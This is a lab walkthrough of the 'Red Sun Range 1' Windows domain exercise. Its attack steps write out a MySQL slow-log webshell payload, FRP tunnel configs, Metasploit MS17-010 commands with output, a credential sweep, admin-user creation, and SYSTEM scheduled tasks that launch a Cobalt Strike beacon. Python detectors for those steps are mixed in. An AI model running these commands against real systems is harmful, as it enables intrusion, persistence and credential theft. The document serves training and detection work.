Red Sun Range 1 (红日靶场1)

Range setup

Red Sun 1 consists of three hosts, configured as follows:

[screenshot: host configuration]

Reconnaissance

The perimeter host drops ping, so the fscan scan needs the -np flag (skip the ICMP liveness probe):

[screenshot: fscan output]

Ports 3306 and 80 are open, so let's brute-force the web directories:

[screenshot: directory scan]

A phpMyAdmin instance turns up; let's take a look.

Getting a shell on the perimeter host

The weak credentials root/root get us into the phpMyAdmin backend:

[screenshot: phpMyAdmin login]

From here I simply used the MySQL slow query log to write a shell:

show variables like '%slow_query_log%';
set global slow_query_log=1;                                          -- enable the slow query log
set global slow_query_log_file='C:\\phpStudy\\WWW\\shell.php';        -- point the log file into the webroot
select '<?php @eval($_POST[1]);?>' or sleep(11);                      -- the sleep must exceed the slow-query threshold, otherwise the query is not logged

Then connect to it with AntSword (蚁剑):

[screenshot: AntSword connection]
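The trick above leaves a clear trail in MySQL's own logs: the SET GLOBAL that redirects a log file into the document root, and a query carrying PHP tags. The following detector is an added example, not code from the post; it runs over constructed general-log entries (the WEBROOTS paths and the rule names are assumptions) and also audits a SHOW VARIABLES snapshot for the settings that make the technique possible.

```python
import re
from typing import Dict, List

# Constructed sample entries in the style of MySQL's general query log
# (timestamp, thread id, command type, argument). The SET GLOBAL statements
# that point the slow log at the webroot are recorded here (or by an audit
# plugin); the slow log itself only receives the final SELECT. Not from the post.
SAMPLE_GENERAL_LOG = [
    "2024-01-01T10:00:00Z\t    8 Connect\troot@localhost on  using TCP/IP",
    "2024-01-01T10:00:01Z\t    8 Query\tshow variables like '%slow_query_log%'",
    "2024-01-01T10:00:02Z\t    8 Query\tset global slow_query_log=1",
    "2024-01-01T10:00:03Z\t    8 Query\tset global slow_query_log_file='C:\\\\phpStudy\\\\WWW\\\\shell.php'",
    "2024-01-01T10:00:04Z\t    8 Query\tselect '<?php @eval($_POST[1]);?>' or sleep(11)",
    "2024-01-01T10:05:00Z\t    9 Query\tselect id, name from users where id = 42",
]

# Assumed document roots of the monitored hosts (phpStudy's default on the
# Win7 box in this range plus a typical Linux one); adjust per environment.
WEBROOTS = ("c:/phpstudy/www/", "/var/www/")
WEB_EXTENSIONS = (".php", ".phtml", ".jsp", ".asp", ".aspx")

ENTRY = re.compile(r"^(\S+)\t\s*(\d+)\s+(\w+)\t(.*)$")
LOG_REDIRECT = re.compile(
    r"set\s+global\s+(slow_query_log_file|general_log_file)\s*=\s*['\"]?([^'\";]+)",
    re.IGNORECASE,
)
SCRIPT_TAG = re.compile(r"<\?php|<\?=|<%|<script\b", re.IGNORECASE)


def normalise_path(path: str) -> str:
    """Lower-case and forward-slash a path as MySQL/Windows may have written it."""
    return path.strip().replace("\\\\", "/").replace("\\", "/").lower()


def in_web_dir(path: str) -> bool:
    """True if the path is a script file or sits under a served document root."""
    p = normalise_path(path)
    return p.endswith(WEB_EXTENSIONS) or p.startswith(WEBROOTS)


def analyse_log(lines: List[str]) -> List[Dict[str, str]]:
    """Flag log-file redirection into the webroot and web-script tags inside query text."""
    findings = []
    for line in lines:
        m = ENTRY.match(line)
        if not m or m.group(3) != "Query":
            continue
        ts, thread, _, query = m.groups()
        r = LOG_REDIRECT.search(query)
        if r and in_web_dir(r.group(2)):
            findings.append({"time": ts, "thread": thread,
                             "rule": "log_file_redirected_to_webroot",
                             "detail": f"{r.group(1).lower()} -> {normalise_path(r.group(2))}"})
        if SCRIPT_TAG.search(query):
            findings.append({"time": ts, "thread": thread,
                             "rule": "script_tag_in_query",
                             "detail": query[:80]})
    return findings


def audit_variables(variables: Dict[str, str]) -> List[str]:
    """Check a SHOW VARIABLES snapshot (name -> value) for risky settings."""
    issues = []
    for name in ("slow_query_log_file", "general_log_file"):
        if in_web_dir(variables.get(name, "")):
            issues.append(f"{name} points into a web-served directory")
    if not variables.get("secure_file_priv"):
        issues.append("secure_file_priv is empty, so SELECT ... INTO OUTFILE can write anywhere the server can")
    return issues


if __name__ == "__main__":
    for f in analyse_log(SAMPLE_GENERAL_LOG):
        print(f)
    print(audit_variables({"slow_query_log_file": "C:\\phpStudy\\WWW\\shell.php",
                           "secure_file_priv": ""}))
```

The two findings on thread 8 land within a second of each other, which is the correlation worth alerting on: a log-path change followed by a query that embeds script tags. Beyond detection, the mitigation is the usual one: the MySQL service account should have no write access to the document root, and root should not be reachable with a default password.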

Internal network penetration

Run ipconfig to probe the internal network:

C:\phpStudy\WWW> ipconfig
Windows IP 配置
以太网适配器 本地连接 5:
   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::9534:7b0c:21aa:e840%26
   IPv4 地址 . . . . . . . . . . . . : 192.168.120.131
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.120.2
以太网适配器 本地连接 3:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
以太网适配器 本地连接 2:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
以太网适配器 Bluetooth 网络连接:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::b022:79c6:8704:ef83%11
   IPv4 地址 . . . . . . . . . . . . : 192.168.52.143
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.52.2

Check for antivirus:

[screenshot: process list]

This machine has no AV installed.

Run fscan against the internal subnet:

start infoscan
(icmp) Target 192.168.52.143  is alive
(icmp) Target 192.168.52.138  is alive
(icmp) Target 192.168.52.141  is alive
[*] Icmp alive hosts len is: 3
192.168.52.141:445 open
192.168.52.138:445 open
192.168.52.141:7002 open
192.168.52.138:88 open
192.168.52.141:7001 open
192.168.52.143:3306 open
192.168.52.143:445 open
192.168.52.141:139 open
192.168.52.138:139 open
192.168.52.141:135 open
192.168.52.143:139 open
192.168.52.138:135 open
192.168.52.143:135 open
192.168.52.138:80 open
192.168.52.143:80 open
192.168.52.141:21 open
192.168.52.141:8099 open
192.168.52.141:8098 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo:
[*]192.168.52.143
   [->]stu1
   [->]192.168.52.143
   [->]192.168.120.131
   [->]169.254.129.186
[+] 192.168.52.143	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]192.168.52.138
   [->]owa
   [->]192.168.52.138
[*] NetBios: 192.168.52.143  stu1.god.org                        Windows 7 Professional 7601 Service Pack 1 
[+] 192.168.52.138	MS17-010	(Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] NetBios: 192.168.52.138  [+]DC owa.god.org                   Windows Server 2008 R2 Datacenter 7601 Service Pack 1 
[*] NetInfo:
[*]192.168.52.141
   [->]root-tvi862ubeh
   [->]192.168.52.141
[*] WebTitle: http://192.168.52.141:7002 code:200 len:2632   title:Sentinel Keys License Monitor
[*] WebTitle: http://192.168.52.138     code:200 len:689    title:IIS7
[+] 192.168.52.141	MS17-010	(Windows Server 2003 3790)
[*] WebTitle: http://192.168.52.141:8099 code:403 len:1409   title:The page must be viewed over a secure channel
[+] ftp://192.168.52.141:21:anonymous 
[*] WebTitle: http://192.168.52.143     code:200 len:14749  title:phpStudy 探针 2014
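Read from the defender's side, this fscan output is an asset inventory with patch priorities in it. The parser below is an added example, not part of the post or of fscan; it takes the output above (embedded inline, with the multi-line NetInfo blocks left out) and ranks the hosts for remediation. The scoring weights are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List

# The fscan output from the post above, used here as the sample input
# (the multi-line "[*] NetInfo:" blocks are omitted; they are not parsed).
FSCAN_OUTPUT = """\
(icmp) Target 192.168.52.143  is alive
(icmp) Target 192.168.52.138  is alive
(icmp) Target 192.168.52.141  is alive
192.168.52.141:445 open
192.168.52.138:445 open
192.168.52.141:7002 open
192.168.52.138:88 open
192.168.52.141:7001 open
192.168.52.143:3306 open
192.168.52.143:445 open
192.168.52.141:139 open
192.168.52.138:139 open
192.168.52.141:135 open
192.168.52.143:139 open
192.168.52.138:135 open
192.168.52.143:135 open
192.168.52.138:80 open
192.168.52.143:80 open
192.168.52.141:21 open
192.168.52.141:8099 open
192.168.52.141:8098 open
[+] 192.168.52.143  MS17-010  (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios: 192.168.52.143  stu1.god.org                        Windows 7 Professional 7601 Service Pack 1
[+] 192.168.52.138  MS17-010  (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] NetBios: 192.168.52.138  [+]DC owa.god.org                   Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] WebTitle: http://192.168.52.141:7002 code:200 len:2632   title:Sentinel Keys License Monitor
[*] WebTitle: http://192.168.52.138     code:200 len:689    title:IIS7
[+] 192.168.52.141  MS17-010  (Windows Server 2003 3790)
[*] WebTitle: http://192.168.52.141:8099 code:403 len:1409   title:The page must be viewed over a secure channel
[+] ftp://192.168.52.141:21:anonymous
[*] WebTitle: http://192.168.52.143     code:200 len:14749  title:phpStudy 探针 2014
"""

IP = r"(\d+\.\d+\.\d+\.\d+)"
ALIVE = re.compile(rf"^\(icmp\) Target {IP}\s+is alive$")
PORT = re.compile(rf"^{IP}:(\d+) open$")
VULN = re.compile(rf"^\[\+\] {IP}\s+(\S+)\s+\((.+)\)$")
NETBIOS = re.compile(rf"^\[\*\] NetBios: {IP}\s+(\[\+\]DC )?(\S+)")
WEB = re.compile(rf"^\[\*\] WebTitle: https?://{IP}(\S*)\s+code:(\d+)\s+len:\d+\s+title:(.*)$")
FTP_ANON = re.compile(rf"^\[\+\] ftp://{IP}:(\d+):anonymous")


def new_host() -> Dict[str, object]:
    return {"hostname": None, "os": None, "dc": False,
            "ports": set(), "vulns": [], "web": [], "findings": []}


def parse_fscan(text: str) -> Dict[str, Dict[str, object]]:
    """Turn fscan's line-oriented output into one record per host."""
    hosts: Dict[str, Dict[str, object]] = defaultdict(new_host)
    for raw in text.splitlines():
        line = raw.strip()
        if m := ALIVE.match(line):
            hosts[m.group(1)]  # make sure the host exists even with no open ports
        elif m := PORT.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := VULN.match(line):
            h = hosts[m.group(1)]
            h["vulns"].append(m.group(2))
            h["os"] = h["os"] or m.group(3)
        elif m := NETBIOS.match(line):
            h = hosts[m.group(1)]
            h["dc"] = bool(m.group(2))
            h["hostname"] = m.group(3)
        elif m := WEB.match(line):
            hosts[m.group(1)]["web"].append((m.group(2) or ":80", int(m.group(3)), m.group(4).strip()))
        elif m := FTP_ANON.match(line):
            hosts[m.group(1)]["findings"].append(f"anonymous FTP on port {m.group(2)}")
    return dict(hosts)


def patch_priority(hosts: Dict[str, Dict[str, object]]) -> List[dict]:
    """Rank hosts for remediation: an unpatched SMB RCE on the domain controller
    outranks the same bug on a workstation. Weights are assumptions, tune them."""
    ranked = []
    for ip, h in hosts.items():
        score, why = 0, []
        if "MS17-010" in h["vulns"]:
            score += 10; why.append("MS17-010 unpatched")
        if h["dc"]:
            score += 5; why.append("domain controller")
        if h["findings"]:
            score += 2 * len(h["findings"]); why.extend(h["findings"])
        if 445 in h["ports"]:
            score += 1; why.append("SMB exposed")
        ranked.append({"ip": ip, "hostname": h["hostname"], "os": h["os"],
                       "score": score, "reasons": why})
    return sorted(ranked, key=lambda r: (-r["score"], r["ip"]))


if __name__ == "__main__":
    for r in patch_priority(parse_fscan(FSCAN_OUTPUT)):
        print(r["score"], r["ip"], r["hostname"], r["reasons"])
```

On this range the domain controller (owa.god.org) comes out on top, which matches the author's reaction below: once every host is missing the MS17-010 patch, the DC is the one to fix first.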

Uh, a bit speechless: every host is MS17-010, so what's the point.

Never mind, let's try it first.

Set up an FRP proxy (Releases · fatedier/frp (github.com)). Server side (frps.ini):

[common]
## 1. Basic server settings
## 7000 is the frp server port; it can be changed
bind_port = 7000
## dashboard_user and dashboard_pwd are the username and password of the frp web dashboard; they can be changed.
dashboard_user = admin
dashboard_pwd = frpadmin@2022
## web dashboard port (7500 by default): log in at http://<server ip>:<dashboard_port>
dashboard_port = 25500
## heartbeat between server and client
heartbeat_timeout = 30
# token: must be identical on the client; client and server authenticate with it, so use a complex value
token=frpToken@admin2022

Run this on the local (attacker) side:

frps.exe -c frps.ini

Client side (frpc.ini):

[common]
server_addr = 192.168.251.1
server_port = 7000
token = frpToken@admin2022

[proxy]
type = tcp
plugin = socks5
remote_port = 25599

Upload this to the Win7 host and run it:

frpc.exe -c frpc.ini

Attacking the DC with MS17-010

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.138 192.168.52.141
set command tasklist
show options
run

MS17-010 goes straight through:

msf6 auxiliary(admin/smb/ms17_010_command) > run
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  192.168.120.1:25599  ...  192.168.52.138:445  ...  OK

[*] 192.168.52.138:445    - Target OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] 192.168.52.138:445    - Built a write-what-where primitive...
[+] 192.168.52.138:445    - Overwrite complete... SYSTEM session obtained!
[+] 192.168.52.138:445    - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.52.138:445    - Getting the command output...
[*] 192.168.52.138:445    - Executing cleanup...
[+] 192.168.52.138:445    - Cleanup was successful
[+] 192.168.52.138:445    - Command completed successfully!
[*] 192.168.52.138:445    - Output for "ipconfig":


Windows IP 配置


以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::b84d:95ca:b6b3:6ddf%11
   IPv4 地址 . . . . . . . . . . . . : 192.168.52.138
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.52.2

隧道适配器 isatap.{D7C92CB6-1939-46AC-85CE-50401CEC5056}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 


[*] Scanned 1 of 2 hosts (50% complete)
[proxychains] Strict chain  ...  192.168.120.1:25599  ...  192.168.52.141:445  ...  OK
[*] 192.168.52.141:445    - Target OS: Windows Server 2003 3790
[*] 192.168.52.141:445    - Filling barrel with fish... done
[*] 192.168.52.141:445    - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.52.141:445    -     [*] Preparing dynamite...
[*] 192.168.52.141:445    -             Trying stick 1 (x64)...Miss
[*] 192.168.52.141:445    -             [*] Trying stick 2 (x86)...Boom!
[*] 192.168.52.141:445    -     [+] Successfully Leaked Transaction!
[*] 192.168.52.141:445    -     [+] Successfully caught Fish-in-a-barrel
[*] 192.168.52.141:445    - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.52.141:445    - Reading from CONNECTION struct at: 0x8d463d60
[*] 192.168.52.141:445    - Built a write-what-where primitive...
[+] 192.168.52.141:445    - Overwrite complete... SYSTEM session obtained!
[+] 192.168.52.141:445    - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.52.141:445    - Getting the command output...
[*] 192.168.52.141:445    - Executing cleanup...
[+] 192.168.52.141:445    - Cleanup was successful
[+] 192.168.52.141:445    - Command completed successfully!
[*] 192.168.52.141:445    - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.52.141
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.52.2


[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16

Attacking the DC with scheduled tasks

Here we go through CS (Cobalt Strike); first get a beacon.

Listener configuration as shown:

[screenshot: listener configuration]

Then generate an exe payload:

[screenshot: payload generation]

Since there is no AV, no evasion is needed here.

[screenshot: beacon check-in]

Once the beacon is up, we consider how to move laterally.

On the Win7 host we can dump credentials:

[screenshot: credential dump]

Here we can see the password is qwe123!@#

Password reuse check

Use qwe123!@# to test for password reuse across the subnet:

proxychains -q crackmapexec smb 192.168.52.1/24 -u 'administrator' -p 'qwe123!@#'

Because of how I set up the lab, all three hosts use the same password, so all three succeeded.

[screenshot: crackmapexec results]
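From the target side, that sweep is one source address authenticating the same account against every host on the subnet within a few seconds, which is a distinctive shape in the Security log. The detector below is an added example, not from the post; it runs over constructed 4624/4625 records (network logons, LogonType 3) and flags both that pattern and the classic spray of many accounts from one source. The window and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

WINDOW = timedelta(minutes=5)   # assumed correlation window
MIN_HOSTS = 3                   # one account succeeding/failing on this many hosts
MIN_ACCOUNTS = 5                # one source failing against this many accounts

# Constructed Security-log records (4624 = logon success, 4625 = failure;
# LogonType 3 = network, which is what SMB authentication produces).
EVENTS = [
    # a credential sweep like the crackmapexec run above, as seen by the
    # targets: one account, one source, every host answers within seconds
    {"EventID": 4624, "TimeCreated": "2024-01-01T10:00:00", "Computer": "stu1.god.org",
     "TargetUserName": "administrator", "LogonType": 3, "IpAddress": "192.168.52.143"},
    {"EventID": 4624, "TimeCreated": "2024-01-01T10:00:01", "Computer": "owa.god.org",
     "TargetUserName": "administrator", "LogonType": 3, "IpAddress": "192.168.52.143"},
    {"EventID": 4624, "TimeCreated": "2024-01-01T10:00:02", "Computer": "root-tvi862ubeh",
     "TargetUserName": "administrator", "LogonType": 3, "IpAddress": "192.168.52.143"},
    # classic spray: one source, many accounts, one failure each
    *[{"EventID": 4625, "TimeCreated": f"2024-01-01T10:10:{i:02d}", "Computer": "owa.god.org",
       "TargetUserName": u, "LogonType": 3, "IpAddress": "192.168.52.99"}
      for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])],
    # benign: one user, one host, one logon
    {"EventID": 4624, "TimeCreated": "2024-01-01T10:20:00", "Computer": "owa.god.org",
     "TargetUserName": "alice", "LogonType": 3, "IpAddress": "192.168.52.50"},
]


def ts(e: dict) -> datetime:
    return datetime.fromisoformat(e["TimeCreated"])


def max_distinct_in_window(evs: List[dict], field: str) -> Tuple[set, str]:
    """Largest set of distinct `field` values seen within WINDOW of any one event."""
    evs = sorted(evs, key=ts)
    best, start = set(), ""
    for i, first in enumerate(evs):
        seen = {e[field] for e in evs[i:] if ts(e) - ts(first) <= WINDOW}
        if len(seen) > len(best):
            best, start = seen, first["TimeCreated"]
    return best, start


def detect(events: List[dict]) -> List[dict]:
    """Two rules over network logons: one credential fanning out across hosts,
    and one source failing against many accounts."""
    net = [e for e in events if e.get("LogonType") == 3 and e["EventID"] in (4624, 4625)]
    by_src_user: Dict[tuple, List[dict]] = defaultdict(list)
    by_src_fail: Dict[str, List[dict]] = defaultdict(list)
    for e in net:
        by_src_user[(e["IpAddress"], e["TargetUserName"].lower())].append(e)
        if e["EventID"] == 4625:
            by_src_fail[e["IpAddress"]].append(e)
    alerts = []
    for (src, user), evs in by_src_user.items():
        hosts, start = max_distinct_in_window(evs, "Computer")
        if len(hosts) >= MIN_HOSTS:
            alerts.append({"rule": "one_credential_many_hosts", "source": src,
                           "account": user, "hosts": sorted(hosts), "start": start})
    for src, evs in by_src_fail.items():
        users, start = max_distinct_in_window(evs, "TargetUserName")
        if len(users) >= MIN_ACCOUNTS:
            alerts.append({"rule": "password_spray", "source": src,
                           "accounts": sorted(users), "start": start})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

Note that the first rule fires on successes as well as failures: a reused local administrator password produces nothing but 4624s, which is exactly why the author's sweep "just worked" and why LAPS-style unique local passwords are the fix rather than lockout policy.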

Next we use IPC for lateral movement.

IPC lateral movement

IPC lateral movement approach:

Use the at scheduler or schtasks scheduled tasks: create a .bat to run commands, or an .exe to get a beacon (at was deprecated after 2008 R2, so schtasks is the better choice).

schtasks demonstration

There are two ways to do this: establish an IPC connection first and then create the scheduled task, or create the scheduled task directly.

Establishing an IPC connection

Workgroup environment:

net use \\192.168.xx.xx\ipc$ "password" /user:"administrator"

Domain environment:

net use \\192.168.xx.xx\ipc$ "password" /user:xxx.com\"administrator"

[screenshot: net use]

Once established, run net use to view the connection state.

Next we would normally run net time to check the target's clock, because the target is not necessarily on Beijing time and sometimes its clock was never set at all, so that we can pick a valid start time when creating an at job later. With schtasks as used here, this step can be skipped.

Because the perimeter Win7 host has its firewall on, the proxy cannot be forwarded to CS, so we add a user, log on to the Win7 desktop and turn the firewall off:

net user qingfeng qwer1234! /add
net localgroup administrators qingfeng /add
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

RDP here only allows local logon too, so we connect through a proxy.

Set up FRP first; that was covered above, so I won't repeat it.

[screenshots: FRP proxy setup]

After adding the remote-desktop proxy, connect directly and turn off the firewall.

[screenshot: firewall disabled]

Creating the scheduled task

schtasks /create /s 192.168.52.138 /tn backdoors /sc minute /mo 1  /tr c:\dc3.exe /ru system /f

[screenshot: schtasks output]

The beacon comes up:

[screenshot: beacon]

When no IPC connection has been established, add the /u and /p parameters to supply the username and password.

But sometimes, because of the current privileges or group policy settings, remotely creating the scheduled task with schtasks may fail with access denied; in that case the credentials of a high-privilege account are also required:

schtasks /create /s 192.168.52.138 /u administrator /p qwe123!@# /tn backdoor /sc minute /mo 1 /tr c:\dc3.exe /ru system /f
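Both schtasks variants above leave the same footprint on the target: Security event 4698 ("A scheduled task was created") carrying the task XML, created from a logon session that arrived over the network (4624, LogonType 3). The detector below is an added example, not code from the post. It parses a constructed TaskContent document (real ones carry more elements), scores the task on principal, repetition interval and binary location, and correlates the creator's SubjectLogonId with a network logon. The trusted-directory list and thresholds are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system"}
# Assumed allow-list of directories a legitimate task binary lives in.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
MAX_BENIGN_INTERVAL_S = 300   # assumed threshold for "suspiciously frequent"


def task_xml(user_id: str, command: str, interval: str = "") -> str:
    """Build a minimal TaskContent document of the shape carried by event 4698
    (constructed for this example; real ones contain more elements)."""
    rep = f"<Repetition><Interval>{interval}</Interval></Repetition>" if interval else ""
    return (
        '<?xml version="1.0" encoding="UTF-16"?>'
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f"<Triggers><TimeTrigger>{rep}<StartBoundary>2024-01-01T10:00:00</StartBoundary>"
        "<Enabled>true</Enabled></TimeTrigger></Triggers>"
        f'<Principals><Principal id="Author"><UserId>{user_id}</UserId>'
        "<RunLevel>HighestAvailable</RunLevel></Principal></Principals>"
        f'<Actions Context="Author"><Exec><Command>{command}</Command></Exec></Actions></Task>'
    )


# Constructed events with the fields of interest from the Security log. The
# first pair mimics a task created over a network logon from the range's Win7
# host (every minute, as SYSTEM, binary in C:\); the third is a benign job.
EVENTS = [
    {"EventID": 4624, "TimeCreated": "2024-01-01T09:59:50", "Computer": "owa.god.org",
     "TargetUserName": "administrator", "TargetLogonId": "0x3e7f1", "LogonType": 3,
     "IpAddress": "192.168.52.143"},
    {"EventID": 4698, "TimeCreated": "2024-01-01T10:00:02", "Computer": "owa.god.org",
     "SubjectUserName": "administrator", "SubjectLogonId": "0x3e7f1",
     "TaskName": "\\backdoors", "TaskContent": task_xml("S-1-5-18", "c:\\dc3.exe", "PT1M")},
    {"EventID": 4698, "TimeCreated": "2024-01-01T11:00:00", "Computer": "owa.god.org",
     "SubjectUserName": "svc_backup", "SubjectLogonId": "0x1a2b3",
     "TaskName": "\\Microsoft\\Windows\\Backup\\Nightly",
     "TaskContent": task_xml("S-1-5-21-1004336348-1177238915-682003330-1105",
                             "c:\\windows\\system32\\wbadmin.exe")},
]


def interval_seconds(iso: str) -> int:
    """Convert an ISO-8601 duration such as PT1M or P1DT2H to seconds (0 if absent)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", iso or "")
    if not iso or not m:
        return 0
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def analyse_task(content: str) -> Dict[str, object]:
    """Pull the security-relevant fields out of a 4698 TaskContent document."""
    # the exported XML starts with a UTF-16 declaration; drop it before parsing the str
    root = ET.fromstring(re.sub(r"^<\?xml[^>]*\?>", "", content.strip()))
    user = (root.findtext(".//t:Principal/t:UserId", default="", namespaces=TASK_NS) or "").lower()
    cmd = (root.findtext(".//t:Exec/t:Command", default="", namespaces=TASK_NS) or "").lower()
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=TASK_NS)
    return {"runs_as_system": user in SYSTEM_IDS,
            "interval_s": interval_seconds(interval),
            "command": cmd,
            "untrusted_path": bool(cmd) and not cmd.startswith(TRUSTED_DIRS)}


def detect_remote_task_creation(events: List[dict]) -> List[dict]:
    """Alert on 4698 events whose task looks like a lateral-movement implant and
    whose creator's session (SubjectLogonId) came in over the network."""
    net_logons = {e["TargetLogonId"]: e for e in events
                  if e["EventID"] == 4624 and e.get("LogonType") == 3}
    alerts = []
    for e in events:
        if e["EventID"] != 4698:
            continue
        info = analyse_task(e["TaskContent"])
        reasons = []
        if info["runs_as_system"]:
            reasons.append("runs as SYSTEM")
        if 0 < info["interval_s"] <= MAX_BENIGN_INTERVAL_S:
            reasons.append(f"repeats every {info['interval_s']}s")
        if info["untrusted_path"]:
            reasons.append(f"binary outside trusted dirs: {info['command']}")
        logon = net_logons.get(e.get("SubjectLogonId"))
        if logon:
            reasons.append(f"created over network logon from {logon['IpAddress']}")
        if len(reasons) >= 2:   # assumed scoring threshold
            alerts.append({"host": e["Computer"], "task": e["TaskName"],
                           "creator": e["SubjectUserName"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_remote_task_creation(EVENTS):
        print(a)
```

Event 4698 is only written when "Audit Other Object Access Events" is enabled; without it, the Microsoft-Windows-TaskScheduler/Operational log (event 106, task registered) is the fallback, and the 5145 share-access events for IPC$ and C$ give the copy of the binary that precedes the task.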

Getting a beacon on the other host (2003) with at

shell net use \\192.168.52.141 "qwe123!@#" /user:"administrator"
shell copy dc3.exe \\192.168.52.141\c$
shell net time
shell at \\192.168.52.141 19:40 C:\dc3.exe

Getting a beacon with at gave me some trouble here; it errors:

[screenshot: at error]

For this host, just use MS17-010 after all; I really couldn't get it to work.

Run msf through proxychains4.

Remember to generate a 32-bit payload; this 2003 host is x86.

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.164.156 192.168.164.161
set command C:\\beacon_x86.exe
show options
run

[screenshot: msf output]

After running it, the beacon comes up:

[screenshot: beacon]

That completes the range.

[screenshot: final beacons]

Attacking the DC with PTH

Pass-the-hash lateral movement can be done from the Win7 host:

[screenshot: hash dump]

[screenshot: PTH]

With the taowu plugin, lateral movement is straightforward.

[screenshot: taowu plugin]